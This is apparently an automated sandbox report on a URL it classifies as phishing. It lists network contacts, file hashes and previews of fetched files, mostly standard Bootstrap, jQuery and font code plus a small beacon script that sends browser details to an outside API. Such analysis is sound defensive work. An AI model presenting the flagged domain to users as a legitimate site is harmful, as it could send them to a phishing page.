                                                stackpath.bootstrapcdn.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                151.101.2.137
                                                unknownUnited States
                                                54113FASTLYUSfalse
                                                142.250.185.170
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                54.225.228.99
                                                pozaweclip.upnana.comUnited States
                                                14618AMAZON-AESUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                142.250.185.131
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                162.241.149.91
                                                7509147325.lawyersfederalcourt.comUnited States
                                                46606UNIFIEDLAYER-AS-1USfalse
                                                142.250.185.74
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                IP
                                                192.168.2.16
                                                192.168.2.23
                                                192.168.2.13
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1585566
                                                Start date and time:2025-01-07 20:46:17 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://pozaweclip.upnana.com/
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal48.phis.win@20/29@60/380
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.185.99, 172.217.16.206, 108.177.15.84, 142.250.185.78
                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • VT rate limit hit for: https://pozaweclip.upnana.com/
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:46:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):4.007716010238022
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:1AD0F444B000ECF130E73EFC27F90BAA
                                                SHA1:7BA8160BFE8A62BB03DBE9C83D7E22AEE9B2A3E4
                                                SHA-256:6FD5FFE298317186C4F402CA902B784CE9F94F84CF3C0BF7B62E299090B8969B
                                                SHA-512:E0F3230A138227753309816463079A0E9F39779882C38D0CC04D7795E393A019C7C510CB1C37577195E02F9DB37C7F69B64767954A7C5397FB7F3CEFCC34FAEE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....V(.<a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.016065082939864
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6F169597FEC1AE2A0AC0DAF31F952003
                                                SHA1:6A29CBFAB11849C6A92DF65EEEB6C93770706092
                                                SHA-256:1AA0297E8314E56A7B0925E8BD40BDE0313EF5CA8E2D6F9D600E5A72F0903E34
                                                SHA-512:6275EBD1B4B1C3E909A22F6BF37EAD6BB63596C13C1E8ECF3AE378481F51733D074E61B76675ACE0E9FF8DF0B4D3EBA2AE71F17CFA3A2EB40129E6BA37AAE2ED
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:46:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):4.006534589325056
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:BAC24A017AAEAEF83B4A7AB9FE050F1A
                                                SHA1:0583A4A74155066AAED02901D8C62F9DB1F0E4FC
                                                SHA-256:A4A904C39DF41B44C3E8E367944F3FAF3DBA43399BD92BA82C8B0B1033D4862C
                                                SHA-512:C3E5CB7DDD97631B291CC1CE23B66F78CDFBD6FD1DD290F75E35360311E4EA40CF0D5A5259D232335DA7A28C990EEF5A6F418A46C7B5D8BB462BBFD0F8038834
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,......".<a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 18:46:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):4.005741682122406
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5E1F06CC6D4446CC422BB003B6776975
                                                SHA1:E987EC1A7C1128082E9D0648510A6A920578E5FE
                                                SHA-256:8BC5C9206FDAEE03AEB2FE5BE1E2B42F7A2D4C70F252EE689275CE867EE758AE
                                                SHA-512:845D15D2ABCF568B7C43E6990C39B73C8C6514609E2C1B04B0FD7424E3DB4E0292CCB8F7D93FF1CB301F6275373351A163832044AF5DDB7AFCC89EECB0290E97
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,........<a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1572)
                                                Category:downloaded
                                                Size (bytes):5973
                                                Entropy (8bit):5.393222621370193
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:84B4D2FB3E351B07EB44BE9076C40C3F
                                                SHA1:F798336EF7F04FB213B51E7D32686B8E682ADAD9
                                                SHA-256:1C93A9EC1B17079D7F97C8176C2AB7807D10C133EFDD87FE2CCC233B152CA399
                                                SHA-512:8A307DCC1D60710FACB22BE693AFE2FFBFD332513FAD153EEAD776DED703A365F494FB1B46B8BCF00D382523C4B8BCA1E93612ED307519C5DF709375132D03F8
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                                Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 55 x 54, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):4.068159130770307
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:26BBC5C3DC46121400036AE6E0514B8F
                                                SHA1:E2A07B5B02490D0802A5D01E0A73DAC8E7848F46
                                                SHA-256:64BB022D90FCBA987DC08C8E672497D0A8976D158B86BEF5F99D8BEB55AC871B
                                                SHA-512:31868D740AA2EC876B1D169720C40A8734A8AEF824AB29B25E5A91DFE407D1491B5F63E6E51FA923218742356D03C970EF437AFD5B18079AAD70916E00C9CD39
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...7...6...........IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2388)
                                                Category:downloaded
                                                Size (bytes):17917
                                                Entropy (8bit):3.850505150817948
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:61C90990CED44B14E968658D86AAC425
                                                SHA1:8F4810B496AD2C3621339B7620506541A5E28C4E
                                                SHA-256:7F618C04C7DBC2DC55D085F8440808916A2810954F05CCB768E6B3598CBF91FC
                                                SHA-512:1408A3059CB6EDEF8DA9D11981FC429BDD9A75FD92AD08F9454ECE478EA6033BFFAAE37BB233FADFC877D8669FE4D4689BE8E49A3A2B09FDBCAD764BDECC6CC8
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/
                                                Preview:<!DOCTYPE html>..<html lang="en">.<head>. <meta charset="utf-8">. <title>Hello</title>. Description, Keywords, OpenGraph -->. wolf data-name="head" --><meta name="HandheldFriendly" content="true" />.<meta name="viewport" content="width=device-width, height=device-height, user-scalable=no" />. <link href='//fonts.googleapis.com/css?family=Merienda:400|Lora:700|Open+Sans:300,400,600,700|Open+Sans+Condensed:300' rel='stylesheet' type='text/css'> -->.<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&family=Abril+Fatface&display=swap&family=Merienda:wght@400&family=Lora:wght@700&family=Open+Sans:wght@300;400;600;700&family=Open+Sans+Condensed:wght@300" rel="stylesheet">.<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.3/dist/umd/popper.min.js" crossorigin="anonymous"></script>.<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.min.js"></script>.<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (65342)
                                                Category:downloaded
                                                Size (bytes):232855
                                                Entropy (8bit):4.978948258931253
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:896192CC65E20F1FCC6D792B5B9A4626
                                                SHA1:B13EF70543D70C1EC7FDD56A5EBC9D7D64023851
                                                SHA-256:D939D21F27010C09B6C2966681D8B4CFCD64CA418F240922518F967FDED16EF6
                                                SHA-512:67F75E7F9CF9BB6691F3D3AECD873198327406777957570AA8111BBCB3A250D59D83D3D079756F5CB23DD1213840E1C695F2EA5270CD540632662F14C144E659
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css
                                                Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.1 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):1533
                                                Entropy (8bit):4.840906208243032
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AA957A6887B91017D2371E6A4AC65802
                                                SHA1:77A3445B7F5DC97867566AB27922A653F339CB4A
                                                SHA-256:AE7DF18C4341F8ED288BDF8A836908FF1454A66B8C3A0C71036A3D70FB89A70F
                                                SHA-512:B75B098A3B66B468CD54DF2B24C800A54025C6267D695F3ACF59F137F2274D70BB59A8E0B0B61CE6092A4588215EF63278A3C5B4AEAA456185751B54FFF8EA94
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/css/always.css
                                                Preview:.wolf_button_container {. position: fixed;. top: 1em;. right: 1em;. z-index: 1;.}..wolf_start_button {. cursor: pointer;. display: block;. background: #fff;. border: 1px solid #000;. padding: 1em 2em;. font-size: 1.1em;. transition: 0.5s;. text-align: center;. width: 120px;.}..wolf_start_button:hover {. background: #000;. color: #fff;.}..wolf_select {. width: 120px;.}..wolf_popup {. border: 1px solid #CCC;. border-radius: 10px;. position: fixed;. bottom: 1em;. left: 1em;. padding: 1em;. max-width: 300px;. width: 100%;.}..modal.show {. z-index: 999999;.}..btn-sub {. display: none;. margin-left:1em !important;.}..btn-sub.show {. display: block;.}.pre {. border: 1px solid #CCC;. padding: 2em;.}..toast-body {. font-size: 1.4em;.}./* Default Design Stuff */..homepage {. max-width: 100%;. padding-top:0px !important;. padding-left:0px !important;. padding-right:0px !important;.}..homepage-
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:assembler source, ASCII text
                                                Category:downloaded
                                                Size (bytes):3576
                                                Entropy (8bit):5.037758003625056
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7A68C0DAF6FD040A963406E572A01567
                                                SHA1:AB912EFCA9625040E3294925BCC13AC2B8DAC1BF
                                                SHA-256:056FCA1F0F9126EEEB962C51B97D0D2E3687353592DFE2B8C6023CC9174F2481
                                                SHA-512:591BA6920D1641961D9B29A410F3AFF1C05F9FF58281F66250713ADCB73ADBCAEF5118F6483F16B8276B2D0D735E80681142C970A3357CD41ABDF2E1DC33967D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/css/theme-scandinavian.css
                                                Preview:./* Scandinavian Design Overrides */./* Google Fonts Include: . <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;700&family=Merriweather:wght@400;700&display=swap" rel="stylesheet">.*/.:root {. --bs-primary: #597088; /* Soft navy blue */. --bs-secondary: #A3B4C4; /* Light grey-blue */. --bs-success: #8FBC8F; /* Muted green */. --bs-danger: #BA6B6C; /* Dusty rose */. --bs-warning: #FFD700; /* Subdued gold */. --bs-info: #B0C4DE; /* Light steel blue */. --bs-light: #FFF; /* Pure white */. --bs-dark: #2E3440; /* Near black */. --bs-font-family-sans-serif: 'Nunito', sans-serif; /* Clean, readable font */. --bs-font-size-base: 1rem;. --bs-border-radius: 0.25rem; /* Slightly rounded edges for a soft look */.}..body {. font-family: var(--bs-font-family-sans-serif);. background-color: var(--bs-light);. color: var(--bs-dark);. line-height: 1.6; /* Increased line height for readability */.}..h1, h2, h3, h4, h5, h6 {. font-fami
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (60303)
                                                Category:dropped
                                                Size (bytes):60582
                                                Entropy (8bit):5.157885709767504
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:BF3B1CAF7CB062CD1B4C0FB44B54CB72
                                                SHA1:D89DB83109AB351D21514A3B08AE5A20A4C77DF9
                                                SHA-256:80E40921AF7E2BF5DD7C0B81920D8E340770E449D06E8930FECD9BF01AAC4458
                                                SHA-512:7C76365224258A952AD1D11A6D2338B3EA619A7F9B731498CD73F8BC05C8B41BC11D4EF300CFE69210998ED0442097B184E33365B80594F2EE12B9491766FED2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:/*!. * Bootstrap v5.3.1 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){const e=Object.create(null,{[Symbol.toStringTag]:{value:"Module"}});if(t)for(const i in t)if("default"!==i){const s=Object.getOwnPropertyDescriptor(t,i);Object.defineProperty(e,i,s.get?s:{enumerable:!0,get:()=>t[i]})}return e.default=t,Object.freeze(e)}const i=e(t),s=new Map,n={set(t,e,i){s.has(t)||s.set(t,new Map);const n=s.get(t);n.has(e)||0===n.size?n.set(e,i):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Arr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text
                                                Category:downloaded
                                                Size (bytes):3032
                                                Entropy (8bit):4.882070557248424
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:70D9DBA590AD49260F1A22F453C965C1
                                                SHA1:7122F056B8433A462B24571EC87178C890C724A0
                                                SHA-256:43805909218598852AB9298B4C9E384C8C17CBBFC63BA68CAB4F08ABF4501067
                                                SHA-512:631D53729A842BEF9B69370DB1236C10FE83F741EAF4269C025C49914F0E77D869B0DA5A21B18F2750F40EFAF5B065FCB88F99CCDF9F0E9DA3E7862A5E0FEAC7
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/css/custom.css
                                                Preview:<!DOCTYPE html>..<html lang="en">.<head>. <meta charset="utf-8">. <title>Hello</title>. Description, Keywords, OpenGraph -->. wolf data-name="head" --><meta name="HandheldFriendly" content="true" />.<meta name="viewport" content="width=device-width, height=device-height, user-scalable=no" />. <link href='//fonts.googleapis.com/css?family=Merienda:400|Lora:700|Open+Sans:300,400,600,700|Open+Sans+Condensed:300' rel='stylesheet' type='text/css'> -->.<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&family=Abril+Fatface&display=swap&family=Merienda:wght@400&family=Lora:wght@700&family=Open+Sans:wght@300;400;600;700&family=Open+Sans+Condensed:wght@300" rel="stylesheet">.<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.3/dist/umd/popper.min.js" crossorigin="anonymous"></script>.<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.min.js"></script>.<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (47520)
                                                Category:dropped
                                                Size (bytes):47521
                                                Entropy (8bit):5.398500199255723
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:301F68F3D8317AB22D4021E266C9A853
                                                SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (320), with no line terminators
                                                Category:dropped
                                                Size (bytes):320
                                                Entropy (8bit):4.965921539248231
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8C45A73B44306A9FA97B8249796C3D35
                                                SHA1:599D8C30DF9C8A50EE0367C32AFB6634976C3607
                                                SHA-256:EC6B43ECFE74E9D4D0AAC8296154D6AD91D2895DE78A2B6349404288B86624D2
                                                SHA-512:05641499DF330FAFEE5918BC872D8787CB51F01F09D99B6E8DC596073FDEE34840B8FBF56E237F7A5AA1D7F1CA99113959FD7461DF0ABF33C219709E48D2D1CD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:window.onload=function e(){var n=new XMLHttpRequest;n.open("POST","https://api.defendium.com/protect",!0),n.setRequestHeader("Content-Type","application/json"),n.send(JSON.stringify({user_agent:navigator.userAgent,referrer:document.referrer||"Direct",site:window.location.hostname,page_name:window.location.pathname}))};
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (32065)
                                                Category:downloaded
                                                Size (bytes):85578
                                                Entropy (8bit):5.366055229017455
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2F6B11A7E914718E0290410E85366FE9
                                                SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
